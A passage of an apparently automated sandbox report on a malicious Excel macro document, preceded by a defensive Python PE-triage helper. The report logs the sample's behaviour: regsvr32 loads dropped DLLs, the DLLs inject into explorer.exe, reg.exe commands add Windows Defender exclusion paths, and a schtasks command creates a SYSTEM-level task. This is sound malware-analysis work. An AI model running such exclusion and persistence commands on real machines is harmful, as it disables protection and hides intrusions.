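    16 data directories, section table; section bodies are zero-filled."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    # Machine i386, NumberOfSections, timestamp, no symbols, SizeOfOptionalHeader 0xE0,
    # Characteristics 0x2102 = EXECUTABLE_IMAGE | 32BIT_MACHINE | DLL.
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0x613B8C85, 0, 0, 0xE0, 0x2102)
    size_of_image = 0x1000 * (len(sections) + 1)
    opt = struct.pack(
        "<HBBIIIIIIIIIHHHHHHIIIIHHIIIIII",
        0x10B, 3, 1, 0x1000, 0x1000, 0, 0x1000, 0x1000, 0x2000,   # magic..BaseOfData
        0x10000000, 0x1000, 0x200, 4, 0, 0, 0, 4, 0,                # ImageBase..versions
        0, size_of_image, 0x400, 0, 2, 0,                           # SizeOfImage, SizeOfHeaders, subsystem
        0x100000, 0x1000, 0x100000, 0x1000, 0, 16,                  # stack/heap, NumberOfRvaAndSizes
    )
    dirs = [(0, 0)] * 16
    dirs[0] = (0x2000, 0x70)              # export table (regsvr32 needs DllRegisterServer)
    if with_imports:
        dirs[1] = (0x3000, 0x28)          # import table present only in the clean control
    data_dirs = b"".join(struct.pack("<II", rva, size) for rva, size in dirs)
    table = b""
    raw_ptr = 0x400
    for i, (name, chars) in enumerate(sections):
        table += struct.pack("<8sIIIIIIHHI", name, 0x1000, 0x1000 * (i + 1), 0x1000,
                             raw_ptr, 0, 0, 0, 0, chars)
        raw_ptr += 0x1000
    header = bytes(dos) + b"PE\0\0" + coff + opt + data_dirs + table
    return header.ljust(raw_ptr, b"\0")


def triage_pe(data):
    """Static checks behind the section-name and import signatures in this report."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    coff = e_lfanew + 4
    machine, nsec, _, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    pe32plus = struct.unpack_from("<H", data, opt)[0] == 0x20B
    num_dirs = struct.unpack_from("<I", data, opt + (108 if pe32plus else 92))[0]
    dirs_at = opt + (112 if pe32plus else 96)

    def directory(i):  # (rva, size) of data directory i, or (0, 0) if absent
        return struct.unpack_from("<II", data, dirs_at + 8 * i) if i < num_dirs else (0, 0)

    sections = []
    for i in range(nsec):
        name, _, va, raw_size, _, _, _, _, _, sc = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0"), "va": va, "size": raw_size, "chars": sc})
    names = [s["name"] for s in sections]
    is_dll = bool(chars & 0x2000)
    findings = []
    nameless = names.count(b"")
    if nameless:
        findings.append(f"nameless_sections={nameless}")
    nonstd = sorted({n for n in names if n and n not in STANDARD_SECTION_NAMES})
    if nonstd:
        findings.append("nonstandard_section_names=" + ",".join(n.decode("latin-1") for n in nonstd))
    if directory(1)[1] == 0:
        findings.append("no_import_directory")
    if is_dll and directory(0)[1] == 0:
        findings.append("dll_without_exports")
    if any(s["chars"] & 0x20000000 and s["chars"] & 0x80000000 for s in sections):
        findings.append("writable_executable_section")
    return {"machine": machine, "is_dll": is_dll, "sections": names, "findings": findings}


if __name__ == "__main__":
    print(triage_pe(build_sample_pe(SAMPLE_SECTIONS)))
```

    On a real sample the same triage_pe call takes the file bytes directly; an empty import directory is what the "does not import any functions" signature sees, and in practice it means the loader resolves its APIs by hand (the report separately flags "Contains functionality to dynamically determine API calls").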
    Source: C:\Windows\System32\wbem\WMIADAP.exeFile deleted: C:\Windows\System32\wbem\Performance\WmiApRpl.hJump to behavior
    Source: C:\Windows\System32\wbem\WMIADAP.exeFile created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.hJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10016EB0
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10012346
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10011758
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10014FC0
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00096EB0
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00092346
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00091758
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00094FC0
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E2C41
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E242A
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E3726
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E1424
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E1C5D
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E34DA
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E3073
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E32EB
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E4162
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005EB114
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E4495
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E1D89
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E1000
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E1827
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_10016EB0
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_10012346
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_10011758
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_10014FC0
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_000F6EB0
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_000F2346
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_000F1758
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_000F4FC0
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_001D242A
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_001D1424
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_001D3726
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_001D2C41
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_001D4495
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_001DB114
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_001D1D89
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_001D1000
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_001D1827
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_001D1C5D
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_001D34DA
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_001D3073
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_001D32EB
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_001D4162
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_10016EB0
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_10012346
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_10011758
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_10014FC0
    Source: Compensation-2308017-09272021.xlsOLE, VBA macro line: Sub auto_open()
    Source: Compensation-2308017-09272021.xlsOLE, VBA macro line: Sub auto_close()
    Source: Compensation-2308017-09272021.xlsOLE, VBA macro line: Private m_openAlreadyRan As Boolean
    Source: Compensation-2308017-09272021.xlsOLE, VBA macro line: Private Sub saWorkbook_Opensa()
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000C6C0 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000CB77 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_1000C6C0 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_1000CB77 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_1000C6C0 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_1000CB77 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary,
    Source: Drezd.red.5.drStatic PE information: No import functions for PE file found
    Source: Drezd1.red.11.drStatic PE information: No import functions for PE file found
    Source: Drezd2.red.17.drStatic PE information: No import functions for PE file found
    Source: Drezd.red.14.drStatic PE information: No import functions for PE file found
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Tououa' /d '0'
    Source: Compensation-2308017-09272021.xlsOLE indicator, VBA macros: true
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\System32\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ......................3..........&A.....(.P.............8.......`.........................................................................3.....
    Source: C:\Windows\System32\reg.exeConsole Write: ................................T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.................N.......(...............
    Source: C:\Windows\System32\reg.exeConsole Write: ................(...............T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y...........).....N.......(...............
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd.red
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd.red
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd1.red
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn icvxxob /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 18:04 /ET 18:16
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd1.red
    Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Drezd.red'
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd2.red
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd2.red
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Tououa' /d '0'
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Gnydpduzkfqu' /d '0'
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\wbem\WMIADAP.exe wmiadap.exe /F /T /R
    Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Drezd.red'
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd.red
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd1.red
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd2.red
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd.red
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn icvxxob /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 18:04 /ET 18:16
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd1.red
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd2.red
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Tououa' /d '0'
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Gnydpduzkfqu' /d '0'
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Application Data\Microsoft\FormsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRF102.tmpJump to behavior
    Source: classification engineClassification label: mal100.expl.evad.winXLS@34/15@0/3
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000D523 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket,
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_100030B7 StartServiceCtrlDispatcherA,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_100030B7 StartServiceCtrlDispatcherA,
    Source: Compensation-2308017-09272021.xlsOLE indicator, Workbook stream: true
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000ABA3 CreateToolhelp32Snapshot,memset,Process32First,Process32Next,CloseHandle,
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\{526DFF4B-742D-4615-933D-F361B4AFFD72}
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\{B679F068-5F86-42B7-A140-3EB78A7914AE}
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \BaseNamedObjects\Global\{D5B7291B-5BC5-4AA0-A2E0-203831E973BD}
    Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\RefreshRA_Mutex
    Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Flag
    Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\ADAP_WMI_ENTRY
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \BaseNamedObjects\{B679F068-5F86-42B7-A140-3EB78A7914AE}
    Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Lib
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{526DFF4B-742D-4615-933D-F361B4AFFD72}
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \BaseNamedObjects\{D5B7291B-5BC5-4AA0-A2E0-203831E973BD}
    Source: C:\Windows\System32\wbem\WMIADAP.exeFile written: C:\Windows\System32\wbem\Performance\WmiApRpl_new.iniJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEWindow found: window name: SysTabControl32
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: Binary string: amstream.pdb source: explorer.exe, 00000005.00000003.441003457.0000000002821000.00000004.00000001.sdmp
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1001A00E push ebx; ret
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1001D485 push FFFFFF8Ah; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1001D4B6 push FFFFFF8Ah; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10019D5C push cs; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10019E5E push cs; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1001BB29 push esi; iretd
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0009A00E push ebx; ret
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0009D485 push FFFFFF8Ah; iretd
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0009D4B6 push FFFFFF8Ah; iretd
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00099D5C push cs; iretd
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00099E5E push cs; iretd
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0009BB29 push esi; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E2C41 push 00000000h; mov dword ptr [esp], esi
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E2C41 push 00000000h; mov dword ptr [esp], esi
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E2C41 push 00000000h; mov dword ptr [esp], esi
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E2C41 push 00000000h; mov dword ptr [esp], ebp
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E2C41 push edi; mov dword ptr [esp], 00000004h
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E2C41 push 00000000h; mov dword ptr [esp], edx
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E242A push 00000000h; mov dword ptr [esp], esi
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E242A push 00000000h; mov dword ptr [esp], edi
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E242A push 00000000h; mov dword ptr [esp], ebx
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E242A push 00000000h; mov dword ptr [esp], edi
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E3726 push 00000000h; mov dword ptr [esp], ebp
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E3726 push 00000000h; mov dword ptr [esp], edx
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E3726 push 00000000h; mov dword ptr [esp], esi
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E3726 push esi; mov dword ptr [esp], 00000001h
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E3726 push 00000000h; mov dword ptr [esp], ecx
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E3726 push 00000000h; mov dword ptr [esp], ebp
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E3726 push 00000000h; mov dword ptr [esp], esi
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E3726 push 00000000h; mov dword ptr [esp], esi
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E3726 push 00000000h; mov dword ptr [esp], ebp
    Source: 44466.7516903935[1].dat.0.drStatic PE information: section name: .rdatat
    Source: 44466.7516903935[1].dat.0.drStatic PE information: section name:
    Source: 44466.7516903935[1].dat.0.drStatic PE information: section name:
    Source: 44466.7516903935[1].dat.0.drStatic PE information: section name:
    Source: Drezd.red.0.drStatic PE information: section name: .rdatat
    Source: Drezd.red.0.drStatic PE information: section name:
    Source: Drezd.red.0.drStatic PE information: section name:
    Source: Drezd.red.0.drStatic PE information: section name:
    Source: 44466.7516903935[2].dat.0.drStatic PE information: section name: .rdatat
    Source: 44466.7516903935[2].dat.0.drStatic PE information: section name:
    Source: 44466.7516903935[2].dat.0.drStatic PE information: section name:
    Source: 44466.7516903935[2].dat.0.drStatic PE information: section name:
    Source: Drezd1.red.0.drStatic PE information: section name: .rdatat
    Source: Drezd1.red.0.drStatic PE information: section name:
    Source: Drezd1.red.0.drStatic PE information: section name:
    Source: Drezd1.red.0.drStatic PE information: section name:
    Source: 44466.7516903935[3].dat.0.drStatic PE information: section name: .rdatat
    Source: 44466.7516903935[3].dat.0.drStatic PE information: section name:
    Source: 44466.7516903935[3].dat.0.drStatic PE information: section name:
    Source: 44466.7516903935[3].dat.0.drStatic PE information: section name:
    Source: Drezd2.red.0.drStatic PE information: section name: .rdatat
    Source: Drezd2.red.0.drStatic PE information: section name:
    Source: Drezd2.red.0.drStatic PE information: section name:
    Source: Drezd2.red.0.drStatic PE information: section name:
    Source: Drezd.red.5.drStatic PE information: section name: .rdatat
    Source: Drezd.red.5.drStatic PE information: section name:
    Source: Drezd.red.5.drStatic PE information: section name:
    Source: Drezd.red.5.drStatic PE information: section name:
    Source: Drezd1.red.11.drStatic PE information: section name: .rdatat
    Source: Drezd1.red.11.drStatic PE information: section name:
    Source: Drezd1.red.11.drStatic PE information: section name:
    Source: Drezd1.red.11.drStatic PE information: section name:
    Source: Drezd.red.14.drStatic PE information: section name: .rdatat
    Source: Drezd.red.14.drStatic PE information: section name:
    Source: Drezd.red.14.drStatic PE information: section name:
    Source: Drezd.red.14.drStatic PE information: section name:
    Source: Drezd2.red.17.drStatic PE information: section name: .rdatat
    Source: Drezd2.red.17.drStatic PE information: section name:
    Source: Drezd2.red.17.drStatic PE information: section name:
    Source: Drezd2.red.17.drStatic PE information: section name:
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000DFAD LoadLibraryA,GetProcAddress,

    Persistence and Installation Behavior:

    Uses cmd line tools excessively to alter registry or file data
    Source: C:\Windows\SysWOW64\explorer.exe | Process created: reg.exe
    Source: C:\Windows\SysWOW64\explorer.exe | Process created: reg.exe
    Source: C:\Windows\SysWOW64\explorer.exe | Process created: reg.exe
    Source: C:\Windows\SysWOW64\explorer.exe | Process created: reg.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Drezd.red
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Drezd1.red
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Drezd2.red
    Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\Drezd.red
    Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\Drezd1.red
    Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\Drezd.red
    Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\Drezd2.red
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[2].dat
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[3].dat
    Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\Drezd1.red
